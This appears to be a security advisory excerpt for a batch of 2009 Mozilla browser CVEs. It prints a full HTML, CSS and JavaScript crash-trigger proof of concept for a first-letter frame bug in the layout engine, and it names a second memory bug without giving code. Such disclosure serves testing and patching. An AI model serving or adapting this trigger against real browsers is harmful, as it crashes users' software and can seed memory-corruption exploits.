CVE reference:
CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383
Complete list of Proof-of-Concept codes (crash triggers)
1. (CVE-2009-3382) CSS Frame Constructor (layout/base/nsCSSFrameConstructor.cpp) in the browser engine does not properly handle first-letter frames
PoC:
<html><head><script>
function doe2(i) {
document.getElementById('a').setAttribute('style', 'display: -moz-box; ');
document.getElementById('c').style.display= 'none';
}
setTimeout(doe2,500,0);
</script>
<style>
div::first-letter {float: right; }
</style>
</head>
<body>
<div style="width: 50px; -moz-column-count: 2;">
a
<span style="display: table-cell;"></span><div style="display: -moz-box; font-size: 43px;">
<span id="a">
<span style="display: -moz-box;">
<span id="c">m</span>
</span>
</span>
</div>
</div>
</body>
</html>
2. (CVE-2009-1563) Array indexing error in NSPR's Balloc() leads to floating point memory vulnerability